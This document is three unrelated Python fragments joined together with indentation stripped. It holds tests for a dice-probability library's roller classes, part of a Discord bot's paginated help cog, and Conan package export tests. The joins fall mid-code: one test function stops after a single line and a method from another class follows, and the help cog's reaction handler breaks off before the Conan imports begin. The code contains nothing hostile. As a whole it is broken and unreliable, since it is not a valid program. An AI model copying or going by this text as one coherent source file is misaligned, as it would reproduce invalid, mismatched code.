r_op_r = r_do_op(r)
left_source, right_source = r_op_r.sources
assert left_source == r
assert right_source == r
assert tuple(r_op_r.roll().outcomes()) == (bool(__op__(o, o)),), r_op_r
r_neg = -r
r_op_r_neg = r_do_op(r_neg)
left_source, right_source = r_op_r_neg.sources
assert left_source == r
assert right_source == r_neg
assert tuple(r_op_r_neg.roll().outcomes()) == (
bool(__op__(o, -o)),
), r_op_r_neg
def test_cmp_lt(self) -> None:
self._test_cmp_op_helper(op_name="lt")
def test_cmp_le(self) -> None:
self._test_cmp_op_helper(op_name="le")
def test_cmp_eq(self) -> None:
self._test_cmp_op_helper(op_name="eq")
def test_cmp_ne(self) -> None:
self._test_cmp_op_helper(op_name="ne")
def test_cmp_gt(self) -> None:
self._test_cmp_op_helper(op_name="gt")
def test_cmp_ge(self) -> None:
self._test_cmp_op_helper(op_name="ge")
def test_roll(self) -> None:
for o_type in _OUTCOME_TYPES:
h = H(o_type(v) for v in range(-2, 3))
r = R.from_value(h, annotation=f"{o_type}")
h_mul_h = h * h
r_mul_r = r * r
for _ in range(10):
r_mul_r_roll = r_mul_r.roll()
(roll_outcome,) = r_mul_r_roll
assert roll_outcome.r == r_mul_r
assert roll_outcome.value in h_mul_h
assert r_mul_r_roll.total() in h_mul_h, r_mul_r
for o in h:
h_mul_o = h * o_type(o)
r_mul_o = r * o_type(o)
r_mul_o_roll = r_mul_o.roll()
(roll_outcome,) = r_mul_o_roll
assert roll_outcome.r == r_mul_o
assert roll_outcome.value in h_mul_o
assert r_mul_o_roll.total() in h_mul_o, r_mul_o
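# An illustrative sketch of the dyce-style API these tests exercise, assuming
# the H (histogram) and R (roller) types imported by this test module:
d6 = H(6)                  # histogram for one fair six-sided die
r_d6 = R.from_value(d6)    # roller that draws single outcomes from d6
one_roll = r_d6.roll()
assert one_roll.total() in d6            # totals stay within the histogram
assert tuple(one_roll.outcomes()) == (one_roll.total(),)  # single source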
class TestUnarySumOpRoller:
def test_repr(self) -> None:
r_42 = R.from_value(42)
r_42_neg = -r_42
assert (
repr(r_42_neg)
== """UnarySumOpRoller(
un_op=<built-in function neg>,
source=ValueRoller(value=42, annotation=''),
annotation='',
)"""
)
r_d6 = R.from_value(H(6), annotation="d6")
r_d6_neg = -r_d6
assert (
repr(r_d6_neg)
== """UnarySumOpRoller(
un_op=<built-in function neg>,
source=ValueRoller(value=H(6), annotation='d6'),
annotation='',
)"""
)
def test_op_eq(self) -> None:
r_42 = R.from_value(42)
r_42_annotated = r_42.annotate("42")
r_42_pos = +r_42
r_42_annotated_pos = +r_42_annotated
r_42_abs = abs(r_42)
r_42_annotated_abs = abs(r_42_annotated)
assert r_42_pos == +r_42
assert r_42_annotated_pos == +r_42.annotate("42")
assert r_42_pos != r_42_annotated_pos
assert r_42_pos != r_42_abs
assert r_42_annotated_pos != r_42_annotated_abs
def test_op_neg(self) -> None:
for o_type in _OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_neg = -r
assert r_neg.un_op == operator.__neg__
(source,) = r_neg.sources
assert source == r, r_neg
assert tuple(r_neg.roll().outcomes()) == (-o,), r_neg
def test_op_pos(self) -> None:
for o_type in _OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_pos = +r
assert r_pos.un_op == operator.__pos__
(source,) = r_pos.sources
assert source == r, r_pos
assert tuple(r_pos.roll().outcomes()) == (+o,), r_pos
def test_op_abs(self) -> None:
for o_type in _OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_abs = abs(r)
assert r_abs.un_op == operator.__abs__
(source,) = r_abs.sources
assert source == r, r_abs
assert tuple(r_abs.roll().outcomes()) == (abs(o),), r_abs
def test_op_invert(self) -> None:
for o_type in _INTEGRAL_OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_inv = ~r
assert r_inv.un_op == operator.__invert__
(source,) = r_inv.sources
assert source == r, r_inv
assert tuple(r_inv.roll().outcomes()) == (~o,), r_inv
def test_even(self) -> None:
for o_type in _INTEGRAL_OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_even = r.is_even()
assert r_even.un_op.__name__ == "_is_even"
(source,) = r_even.sources
assert source == r, r_even
assert tuple(r_even.roll().outcomes()) == (o_type(o) % 2 == 0,), r_even
def test_odd(self) -> None:
for o_type in _INTEGRAL_OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o_type(o), annotation=f"{o_type}({o})")
r_odd = r.is_odd()
assert r_odd.un_op.__name__ == "_is_odd"
(source,) = r_odd.sources
assert source == r, r_odd
assert tuple(r_odd.roll().outcomes()) == (o_type(o) % 2 != 0,), r_odd
def test_roll(self) -> None:
for o_type in _OUTCOME_TYPES:
h = H(o_type(v) for v in range(-2, 3))
h_neg = -h
r = R.from_value(h, annotation=f"{o_type}")
r_neg = -r
for _ in range(10):
r_neg_roll = r_neg.roll()
(roll_outcome,) = r_neg_roll
assert roll_outcome.r == r_neg
assert r_neg_roll.total() in h_neg, r_neg
class TestPoolRoller:
def test_repr(self) -> None:
r_4_6_8 = R.from_values(4, 6, 8)
assert (
repr(r_4_6_8)
== """PoolRoller(
sources=(
ValueRoller(value=4, annotation=''),
ValueRoller(value=6, annotation=''),
ValueRoller(value=8, annotation=''),
),
annotation='',
)"""
)
r_d4_d6_d8 = R.from_values(H(4), H(6), H(8), annotation="d4d6d8")
assert (
repr(r_d4_d6_d8)
== """PoolRoller(
sources=(
ValueRoller(value=H(4), annotation=''),
ValueRoller(value=H(6), annotation=''),
ValueRoller(value=H(8), annotation=''),
),
annotation='d4d6d8',
)"""
)
def test_op_eq(self) -> None:
r_4_6_8 = R.from_values(4, 6, 8)
assert isinstance(r_4_6_8, PoolRoller)
r_4_6_8_annotated = r_4_6_8.annotate("4-6-8")
assert r_4_6_8 == R.from_values(4, 6, 8)
assert r_4_6_8 != r_4_6_8_annotated
assert r_4_6_8_annotated == R.from_values(4, 6, 8, annotation="4-6-8")
def test_getitem(self) -> None:
r_d4_d6_d8 = R.from_values(H(4), H(6), H(8))
assert len(r_d4_d6_d8.sources) == 3, r_d4_d6_d8
assert isinstance(r_d4_d6_d8.sources[0], ValueRoller)
assert r_d4_d6_d8.sources[0].value == H(4)
assert isinstance(r_d4_d6_d8.sources[1], ValueRoller)
assert r_d4_d6_d8.sources[1].value == H(6)
assert isinstance(r_d4_d6_d8.sources[2], ValueRoller)
assert r_d4_d6_d8.sources[2].value == H(8)
def test_roll(self) -> None:
for o_type in _OUTCOME_TYPES:
h = H(o_type(v) for v in range(-2, 3))
h_3 = 3 @ h
r = R.from_value(h, annotation=f"{o_type}")
r_3 = R.from_sources(r, r, r)
for _ in range(10):
r_3_roll = r_3.roll()
assert len(r_3_roll) == 3, r_3_roll
for roll_outcome in r_3_roll:
assert roll_outcome.r == r
assert r_3_roll.total() in h_3, r_3_roll
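# Sketch of the equivalence test_roll relies on: the total of a pool of three
# independent d6 rollers always lands inside the histogram sum 3 @ H(6):
d6 = H(6)
r_pool = R.from_sources(R.from_value(d6), R.from_value(d6), R.from_value(d6))
pool_roll = r_pool.roll()
assert len(pool_roll) == 3               # one roll outcome per source
assert pool_roll.total() in (3 @ d6)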
class TestSelectRoller:
def test_repr(self) -> None:
r_squares = R.from_values_iterable(v ** 2 for v in range(6, 0, -1))
r_squares_select = r_squares.select(0, -1)
assert (
repr(r_squares_select)
== """SelectionRoller(
which=(0, -1),
sources=(
PoolRoller(
sources=(
ValueRoller(value=36, annotation=''),
ValueRoller(value=25, annotation=''),
ValueRoller(value=16, annotation=''),
ValueRoller(value=9, annotation=''),
ValueRoller(value=4, annotation=''),
ValueRoller(value=1, annotation=''),
),
annotation='',
),
),
annotation='',
)"""
)
def test_op_eq(self) -> None:
r_squares = R.from_values_iterable(v ** 2 for v in range(6, 0, -1))
r_squares_select = r_squares.select(0, -1, 1, -2)
r_squares_select_annotated = r_squares_select.annotate("0, -1, 1, 2")
assert r_squares_select == r_squares.select(0, -1, 1, -2)
assert r_squares_select != r_squares_select_annotated
assert r_squares_select_annotated == r_squares_select.annotate("0, -1, 1, 2")
def test_roll(self) -> None:
r_squares = R.from_values_iterable(v ** 2 for v in range(6, 0, -1))
r_squares_select = r_squares.select(0, -1, 1, -2)
r_squares_select_roll = r_squares_select.roll()
assert tuple(r_squares_select_roll.outcomes()) == (1, 36, 4, 25)
for roll_outcome in r_squares_select_roll:
if roll_outcome.value is None:
assert roll_outcome.r is r_squares_select
else:
assert roll_outcome.r in r_squares.sources
class TestRoll:
def test_repr(self) -> None:
r_42 = R.from_value(42)
r_42_neg = -r_42
r_42_neg_roll = r_42_neg.roll()
assert (
repr(r_42_neg_roll)
== """Roll(
r=UnarySumOpRoller(
un_op=<built-in function neg>,
source=ValueRoller(value=42, annotation=''),
annotation='',
),
roll_outcomes=(
RollOutcome(
value=-42,
sources=(
RollOutcome(
value=42,
sources=(),
),
),
),
),
source_rolls=(
Roll(
r=ValueRoller(value=42, annotation=''),
roll_outcomes=(
RollOutcome(
value=42,
sources=(),
),
),
source_rolls=(),
),
),
)"""
)
def test_getitem(self) -> None:
r_123 = R.from_values(1, 2, 3)
r_123_roll = r_123.roll()
assert len(r_123_roll) == 3, r_123_roll
assert (
r_123_roll[:]
== tuple(r_123_roll[i] for i in range(len(r_123_roll)))
== tuple(r_123_roll)
)
def test_hierarchy(self) -> None:
d6 = H(6)
r_d6 = R.from_value(d6)
d6_mul2 = 2 * d6
r_d6_mul2 = 2 * r_d6
d6_mul2_neg = -d6_mul2
r_d6_mul2_neg = -r_d6_mul2
d6_mul2_neg_add4 = d6_mul2_neg + 4
r_d6_mul2_neg_add4 = r_d6_mul2_neg + 4
d6_mul2_neg_add4_3 = 3 @ d6_mul2_neg_add4
r_d6_mul2_neg_add4_3 = 3 @ r_d6_mul2_neg_add4
r_d6_mul2_neg_add4_3_roll = r_d6_mul2_neg_add4_3.roll()
assert r_d6_mul2_neg_add4_3_roll.total() in d6_mul2_neg_add4_3
assert len(r_d6_mul2_neg_add4_3_roll) == 3, r_d6_mul2_neg_add4_3_roll
for r_d6_mul2_neg_add4_roll in r_d6_mul2_neg_add4_3_roll.source_rolls:
(r_d6_mul2_neg_add4_ro,) = r_d6_mul2_neg_add4_roll
assert r_d6_mul2_neg_add4_ro.value in d6_mul2_neg_add4
(r_d6_mul2_neg_roll, _) = r_d6_mul2_neg_add4_roll.source_rolls
(r_d6_mul2_neg_ro,) = r_d6_mul2_neg_roll
assert r_d6_mul2_neg_ro.value in d6_mul2_neg
(r_d6_mul2_roll,) = r_d6_mul2_neg_roll.source_rolls
(r_d6_mul2_ro,) = r_d6_mul2_roll
assert r_d6_mul2_ro.value in d6_mul2
(r_d6_roll, _) = r_d6_mul2_roll.source_rolls
(r_d6_ro,) = r_d6_roll
assert r_d6_ro.value in d6
for r_d6_mul2_neg_add4_3_ro in r_d6_mul2_neg_add4_3_roll:
assert r_d6_mul2_neg_add4_3_ro.r == r_d6_mul2_neg_add4
(r_d6_mul2_neg_ro, _) = r_d6_mul2_neg_add4_3_ro.sources
assert r_d6_mul2_neg_ro.r == r_d6_mul2_neg
(r_d6_mul2_ro,) = r_d6_mul2_neg_ro.sources
assert r_d6_mul2_ro.r == r_d6_mul2
(_, r_d6_ro) = r_d6_mul2_ro.sources
assert r_d6_ro.r == r_d6
class TestRollOutcome:
def test_is_even(self) -> None:
six = RollOutcome(6)
six_even = six.is_even()
assert six_even.value is True
assert six_even.sources == (six,)
def test_is_odd(self) -> None:
six = RollOutcome(6)
six_odd = six.is_odd()
assert six_odd.value is False
assert six_odd.sources == (six,)
def test_euthanize(self) -> None:
six = RollOutcome(6)
rip_six = six.euthanize()
async def send_help_for(self, ctx: Context, cmd: Union[Cog, Command, Group] = None, msg: str = None) -> Message:
"""Sends the help manual for a command, cog, or the bot itself. Be careful
as this method is not the builtin default help_command and will be
removed if the cog is unloaded"""
# Set the title of the embed so custom messages can be added in
self.title = msg
# Good thing Cog, Command, and Group all have .qualified_name
# If no cmd, Bot help page will be sent
msg = await self.command_callback(ctx, command=cmd.qualified_name if cmd else None)
# Remove title, so it doesn't carry over
# Would move to prepare_help_command, but it is called in command_callback
self.title = None
return msg
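# Hedged usage sketch (names hypothetical): once the Help cog below is loaded,
# this coroutine is exposed as bot.send_help_for, so other cogs can do e.g.:
#
#     await self.bot.send_help_for(
#         ctx, self.some_command, msg="Incorrect arguments, see usage below")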
def format_doc(self, item: Union[Bot, Cog, Command, Group]) -> Tuple[str, str]:
"""Get and format the help information to be added to embeds
Change this method to change markdown and formatting"""
# Only added to Embed body, so description is fine
# Fields will be headed by Cogs and filled by Commands
if isinstance(item, Bot):
if item.description:
desc = item.description.replace("[p]", self.prefix)
# Maximum embed body description length
if len(desc) > 2043:
desc = f"{desc[:2043]}..."
# Don't need bot name since it's in the Embed Author
return f"*{desc}*", ""
else:
# Need to have something in the body and v1.2.4 doesn't respect ZWSPs anymore, so repeat bot name
return f"*{item.user.name}*", ""
# Get Cog name and description if it has one
# Both are added to the body
elif isinstance(item, Cog):
if item.description:
# "CogName", "*Description: $command for use*"
return item.qualified_name, f"*{item.description.replace('[p]', self.prefix)}*"
else:
# "CogName", ""
return item.qualified_name, ""
# Groups and Commands are treated the same
elif isinstance(item, Command) or isinstance(item, Group):
# Command.brief can optionally be set at definition
# Use it if it's available, otherwise, use the automatic short_doc using first line from docstr
brief = item.brief if item.brief else item.short_doc
# Command.help is automatically set from full docstr on definition
desc = item.help
# .help will be None if no docstr
if desc:
desc = desc.replace(brief, "").strip("\n").replace("[p]", self.prefix)
# If no .help or if .help same as .short_doc
if not desc:
desc = "No help manual page exists for this command."
# If no .brief or no .short_doc, change to .name after checking .help in case name is mentioned in .help
if not brief:
brief = item.name
return brief, desc
else:
raise TypeError(f"{str(item)}: {item.__class__.__name__} not a subclass of Bot, Cog, Command, or Group.")
def format_cmds_list(self, cmds: List[Union[Command, Group]]) -> str:
"""Formats and paginates the list of a cog's commands
Change this method to change markdown and how commands are
listed for Bot, Cog, and Group. The result is paginated later
in paginate_field."""
lines = list()
for cmd in cmds:
# Get and format the one line entry for cmd
brief, _ = self.format_doc(cmd)
lines.append(f"**{self.prefix}{cmd.qualified_name}** {brief}")
return "\n".join(lines)
""" #####################################################################################
Callbacks for help command for arguments Bot [no argument], Cog, Command, and Group
##################################################################################### """
async def send_bot_help(self, mapping: Dict[Union[Cog, None], List[Command]], msg: str = None) -> Message:
"""Prepares help for help command with no argument"""
em = self.em_base()
fields = list()
# Set Embed body description as cog's docstr
em.description, _ = self.format_doc(self.bot)
for cog, cmds in mapping.items():
# Get list of unhidden commands in cog that user passes checks for
cmds = await self.filter_commands(cmds, sort=True)
# If cog doesn't have any commands user can run, skip it
if not cmds:
continue
# Get header (Category name) for Embed field
category = cog.qualified_name if cog else "No Category"
# Add fields for commands list
formatted_cmds = self.format_cmds_list(cmds)
paginated_fields = self.paginate_field(f"**__{category}__**", formatted_cmds, f"**__{category} (Cont.)__**")
fields.extend(paginated_fields)
return await self.send(em, fields)
async def send_cog_help(self, cog: Cog) -> Message:
"""Prepares help when argument is a Cog"""
em = self.em_base()
fields = list()
# Add Cog name and description if it has one
em.description = "**__{}__**\n{}".format(*self.format_doc(cog))
# Get list of un-hidden, enabled commands that the invoker passes the checks to run
cmds = await self.filter_commands(cog.get_commands(), sort=True)
# Add fields for commands list
if cmds:
str_cmds = self.format_cmds_list(cmds)
paginated_fields = self.paginate_field(f"**__Commands__**", str_cmds, f"**__Commands (Cont.)__**")
fields.extend(paginated_fields)
return await self.send(em, fields)
async def send_group_help(self, group: Group) -> Message:
"""Prepares help when argument is a command Group"""
em = self.em_base()
fields = list()
# Get command usage
if group.usage:
usage = f"`Syntax: {self.prefix}{group.qualified_name} {group.usage}`"
else:
usage = f"`Syntax: {self.get_command_signature(group)}`"
# Add command name and usage to Embed body description
em.description = f"**__{group.qualified_name}__**\n{usage}"
# Add fields for command help manual
brief, doc = self.format_doc(group)
paginated_fields = self.paginate_field(f"__{brief}__", doc, f"(Cont.)")
fields.extend(paginated_fields)
# Get subcommands if any and add them
cmds = await self.filter_commands(group.commands, sort=True)
if cmds:
str_cmds = self.format_cmds_list(cmds)
paginated_fields = self.paginate_field(f"**__Subcommands__**", str_cmds, f"**__Subcommands (Cont.)__**")
fields.extend(paginated_fields)
return await self.send(em, fields)
async def send_command_help(self, cmd: Command) -> Message:
"""Prepares help when argument is a Command"""
em = self.em_base()
fields = list()
# Get command usage
if cmd.usage:
usage = f"`Syntax: {self.prefix}{cmd.qualified_name} {cmd.usage}`"
else:
usage = f"`Syntax: {self.get_command_signature(cmd)}`"
# Add command name and usage to Embed body description
em.description = f"**__{cmd.qualified_name}__**\n{usage}"
# Add fields for command help manual
brief, doc = self.format_doc(cmd)
paginated_fields = self.paginate_field(f"__{brief}__", doc, f"(Cont.)")
fields.extend(paginated_fields)
return await self.send(em, fields)
class Help(Cog):
"""Formats and Provides Help Manual Documentation for Commands
`[p]help` will show all available commands
`[p]help Category` will show all commands belonging to a category
`[p]help command` will show a command's help page and all available subcommands if any"""
def __init__(self, bot: Bot):
self.bot = bot
# Store the currently loaded implementation of HelpCommand
self._original_help_command = bot.help_command
# Replace currently loaded help_command with ours and set this cog as cog so it's not uncategorized
bot.help_command = HelpCommand(dm_help=self.bot.dm_help, field_limit=5, time_limit=120)
bot.help_command.cog = self
# Make send_help_for available as a coroutine method of Bot
bot.send_help_for = bot.help_command.send_help_for
# Dict to store active help sessions with paginated output
self.active_help = dict()
def cog_unload(self):
"""House-cleaning when cog is unloaded
Restore state of help_command to before cog was loaded"""
# Use the cog property setter to remove this Cog from help_command
self.bot.help_command.cog = None
# Restore the help_command that was loaded before cog load
self.bot.help_command = self._original_help_command
async def send_help_for(ctx: Context, cmd: Union[Cog, Command, Group] = None, msg: str = None) -> None:
"""Dummy placeholder to alert and prevent accidental usage after removal"""
raise AttributeError(f"Coroutine `Bot.send_help_for` is not available after Help cog is unloaded.\n"
f"Params: ctx: {ctx}\n"
f" cmd: {cmd}\n"
f" msg: {msg}")
# Replace send_help_for with a dummy coro that raises AttributeError if
# it is attempted to be used after cog is unloaded
self.bot.send_help_for = send_help_for
self.bot.help_command.send_help_for = send_help_for
@Cog.listener("on_reaction_add")
async def on_reaction_add(self, react: Reaction, user: Union[Member, User]):
"""Called when a user adds a reaction to a message
We'll use this to make the help command interactive.
Reactions to change the page if it's long enough to be
paginated."""
# Ignore bot's own reactions
if user.id == self.bot.user.id:
return
# Ignore if the message is not watched (not an active help manual message)
if react.message.id not in self.active_help.keys():
return
# Shorter code and helped with type hinting
msg: Message = react.message
# Add a little delay so we don't run into cache issues
await sleep(0.1)
# We can't remove reactions in Direct Messages
if not isinstance(msg.channel, DMChannel):
# Since it's not the bot and is a watched message, remove reactions we don't care about
if react.emoji not in ["⏮", "◀", "▶", "⏭", "❌"]:
await react.remove(user)
return
# We don't care about reactions that aren't from the user who used [p]help
if user.id != self.active_help[msg.id]["author"].id:
await react.remove(user)
return
# Remove the reaction so key can be pressed again without user removing it first
await react.remove(user)
# Another small delay to avoid cache issues when editing/deleting message after deleting emoji
await sleep(0.1)
# Shorter code
active_help = self.active_help[msg.id]
# Scrub back to first page and set as current index
if react.emoji == "⏮":
# Ignore if already on first page
if active_help["current"] == 0:
return
# Set index to first and edit message to first page
self.active_help[msg.id]["current"] = 0
await msg.edit(embed=active_help["pages"][0])
return
# Move back one page
import os
import stat
import textwrap
import unittest
from parameterized import parameterized
from conans.model.manifest import FileTreeManifest
from conans.model.ref import ConanFileReference
from conans.paths import CONANFILE, CONAN_MANIFEST
from conans.test.utils.cpp_test_files import cpp_hello_conan_files
from conans.test.utils.tools import TestClient, GenConanfile
from conans.test.utils.tools import create_local_git_repo
from conans.util.files import load, save
class ExportSettingsTest(unittest.TestCase):
def test_basic(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
settings = {"os": ["Linux"]}
"""
files = {CONANFILE: conanfile}
client.save(files)
client.run("export . lasote/stable")
self.assertIn("WARN: Conanfile doesn't have 'license'", client.out)
client.run("install Hello/1.2@lasote/stable -s os=Windows", assert_error=True)
self.assertIn("'Windows' is not a valid 'settings.os' value", client.out)
self.assertIn("Possible values are ['Linux']", client.out)
def export_without_full_reference_test(self):
client = TestClient()
client.save({"conanfile.py": """from conans import ConanFile
class MyPkg(ConanFile):
pass
"""})
client.run("export . lasote/stable", assert_error=True)
self.assertIn("conanfile didn't specify name", client.out)
client.save({"conanfile.py": """from conans import ConanFile
class MyPkg(ConanFile):
name="Lib"
"""})
client.run("export . lasote/stable", assert_error=True)
self.assertIn("conanfile didn't specify version", client.out)
client.save({"conanfile.py": """from conans import ConanFile
class MyPkg(ConanFile):
pass
"""})
client.run("export . lib/1.0@lasote/channel")
self.assertIn("lib/1.0@lasote/channel: A new conanfile.py version was exported",
client.out)
client.save({"conanfile.py": """from conans import ConanFile
class MyPkg(ConanFile):
name="Lib"
version="1.0"
"""})
client.run("export . lasote", assert_error=True)
self.assertIn("Invalid parameter 'lasote', specify the full reference or user/channel",
client.out)
def test_export_read_only(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "file1.txt"
exports_sources = "file2.txt"
"""
ref = ConanFileReference.loads("Hello/1.2@lasote/stable")
export_path = client.cache.package_layout(ref).export()
export_src_path = client.cache.package_layout(ref).export_sources()
files = {CONANFILE: conanfile,
"file1.txt": "",
"file2.txt": ""}
client.save(files)
mode1 = os.stat(os.path.join(client.current_folder, "file1.txt")).st_mode
mode2 = os.stat(os.path.join(client.current_folder, "file2.txt")).st_mode
os.chmod(os.path.join(client.current_folder, "file1.txt"), mode1 &~ stat.S_IWRITE)
os.chmod(os.path.join(client.current_folder, "file2.txt"), mode2 &~ stat.S_IWRITE)
client.run("export . lasote/stable")
self.assertEqual(load(os.path.join(export_path, "file1.txt")), "")
self.assertEqual(load(os.path.join(export_src_path, "file2.txt")), "")
with self.assertRaises(IOError):
save(os.path.join(export_path, "file1.txt"), "")
with self.assertRaises(IOError):
save(os.path.join(export_src_path, "file2.txt"), "")
self.assertIn("WARN: Conanfile doesn't have 'license'", client.out)
files = {CONANFILE: conanfile,
"file1.txt": "file1",
"file2.txt": "file2"}
os.chmod(os.path.join(client.current_folder, "file1.txt"), mode1 | stat.S_IWRITE)
os.chmod(os.path.join(client.current_folder, "file2.txt"), mode2 | stat.S_IWRITE)
client.save(files)
client.run("export . lasote/stable")
self.assertEqual(load(os.path.join(export_path, "file1.txt")), "file1")
self.assertEqual(load(os.path.join(export_src_path, "file2.txt")), "file2")
client.run("install Hello/1.2@lasote/stable --build=missing")
self.assertIn("Hello/1.2@lasote/stable: Generating the package", client.out)
files = {CONANFILE: conanfile,
"file1.txt": "",
"file2.txt": ""}
client.save(files)
os.chmod(os.path.join(client.current_folder, "file1.txt"), mode1 &~ stat.S_IWRITE)
os.chmod(os.path.join(client.current_folder, "file2.txt"), mode2 &~ stat.S_IWRITE)
client.run("export . lasote/stable")
self.assertEqual(load(os.path.join(export_path, "file1.txt")), "")
self.assertEqual(load(os.path.join(export_src_path, "file2.txt")), "")
client.run("install Hello/1.2@lasote/stable --build=Hello")
self.assertIn("Hello/1.2@lasote/stable: Generating the package", client.out)
def test_code_parent(self):
""" when referencing the parent, the relative folder "sibling" will be kept
"""
base = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "../*.txt"
"""
for conanfile in (base, base.replace("../*.txt", "../sibling*")):
client = TestClient()
files = {"recipe/conanfile.py": conanfile,
"sibling/file.txt": "Hello World!"}
client.save(files)
client.current_folder = os.path.join(client.current_folder, "recipe")
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
content = load(os.path.join(export_path, "sibling/file.txt"))
self.assertEqual("Hello World!", content)
def test_code_sibling(self):
# if provided a path with a slash, it will be used as an export base
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "../sibling/*.txt"
"""
files = {"recipe/conanfile.py": conanfile,
"sibling/file.txt": "Hello World!"}
client.save(files)
client.current_folder = os.path.join(client.current_folder, "recipe")
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
content = load(os.path.join(export_path, "file.txt"))
self.assertEqual("Hello World!", content)
def test_code_several_sibling(self):
# if provided a path with a slash, it will be used as an export base
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports_sources = "../test/src/*", "../cpp/*", "../include/*"
"""
files = {"recipe/conanfile.py": conanfile,
"test/src/file.txt": "Hello World!",
"cpp/file.cpp": "Hello World!",
"include/file.h": "Hello World!"}
client.save(files)
client.current_folder = os.path.join(client.current_folder, "recipe")
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export_sources()
self.assertEqual(sorted(['file.txt', 'file.cpp', 'file.h']),
sorted(os.listdir(export_path)))
@parameterized.expand([("myconanfile.py", ), ("Conanfile.py", )])
def test_filename(self, filename):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
"""
client.save({filename: conanfile})
client.run("export %s lasote/stable" % filename)
self.assertIn("Hello/1.2@lasote/stable: A new conanfile.py version was exported",
client.out)
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
conanfile = load(os.path.join(export_path, "conanfile.py"))
self.assertIn('name = "Hello"', conanfile)
manifest = load(os.path.join(export_path, "conanmanifest.txt"))
self.assertIn('conanfile.py: cac514c81a0af0d87fa379b0bf16fbaa', manifest)
def test_exclude_basic(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "*.txt", "!*file1.txt"
exports_sources = "*.cpp", "!*temp.cpp"
"""
client.save({CONANFILE: conanfile,
"file.txt": "",
"file1.txt": "",
"file.cpp": "",
"file_temp.cpp": ""})
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
exports_sources_path = client.cache.package_layout(ref).export_sources()
self.assertTrue(os.path.exists(os.path.join(export_path, "file.txt")))
self.assertFalse(os.path.exists(os.path.join(export_path, "file1.txt")))
self.assertTrue(os.path.exists(os.path.join(exports_sources_path, "file.cpp")))
self.assertFalse(os.path.exists(os.path.join(exports_sources_path, "file_temp.cpp")))
def test_exclude_folders(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class TestConan(ConanFile):
name = "Hello"
version = "1.2"
exports = "*.txt", "!*/temp/*"
"""
client.save({CONANFILE: conanfile,
"file.txt": "",
"any/temp/file1.txt": "",
"other/sub/file2.txt": ""})
client.run("export . lasote/stable")
ref = ConanFileReference("Hello", "1.2", "lasote", "stable")
export_path = client.cache.package_layout(ref).export()
self.assertTrue(os.path.exists(os.path.join(export_path, "file.txt")))
self.assertFalse(os.path.exists(os.path.join(export_path, "any/temp/file1.txt")))
self.assertTrue(os.path.exists(os.path.join(export_path, "other/sub/file2.txt")))
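# A minimal sketch of the exclusion semantics exercised above: a leading "!"
# marks an exclude pattern, so this hypothetical recipe would export every
# .txt file except those under any temp/ directory:
from conans import ConanFile
class SketchConan(ConanFile):
    name = "Sketch"
    version = "0.1"
    exports = "*.txt", "!*/temp/*"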
class ExportTest(unittest.TestCase):
def setUp(self):
self.client = TestClient()
self.files = cpp_hello_conan_files("Hello0", "0.1")
self.ref = ConanFileReference("Hello0", "0.1", "lasote", "stable")
self.client.save(self.files)
self.client.run("export . lasote/stable")
def test_basic(self):
""" simple registration of a new conans
"""
reg_path = self.client.cache.package_layout(self.ref).export()
manif = FileTreeManifest.load(self.client.cache.package_layout(self.ref).export())
self.assertIn('%s: A new conanfile.py version was exported' % str(self.ref),
self.client.out)
self.assertIn('%s: Folder: %s' % (str(self.ref), reg_path), self.client.out)
self.assertTrue(os.path.exists(reg_path))
for name in list(self.files.keys()):
self.assertTrue(os.path.exists(os.path.join(reg_path, name)))
expected_sums = {'hello.cpp': '4f005274b2fdb25e6113b69774dac184',
'main.cpp': '0479f3c223c9a656a718f3148e044124',
'CMakeLists.txt': '10d907c160c360b28f6991397a5aa9b4',
'conanfile.py': '355949fbf0b4fc32b8f1c5a338dfe1ae',
'executable': '68b329da9893e34099c7d8ad5cb9c940',
'helloHello0.h': '9448df034392fc8781a47dd03ae71bdd'}
self.assertEqual(expected_sums, manif.file_sums)
def test_case_sensitive(self):
self.files = cpp_hello_conan_files("hello0", "0.1")
self.ref = ConanFileReference("hello0", "0.1", "lasote", "stable")
self.client.save(self.files)
self.client.run("export . lasote/stable", assert_error=True)
self.assertIn("ERROR: Cannot export package with same name but different case",
self.client.out)
def test_export_filter(self):
content = """
from conans import ConanFile
class OpenSSLConan(ConanFile):
name = "openssl"
version = "2.0.1"
"""
save(os.path.join(self.client.current_folder, CONANFILE), content)
self.client.run("export . lasote/stable")
ref = ConanFileReference.loads('openssl/2.0.1@lasote/stable')
reg_path = self.client.cache.package_layout(ref).export()
self.assertEqual(sorted(os.listdir(reg_path)),
[CONANFILE, CONAN_MANIFEST])
content = """
from conans import ConanFile
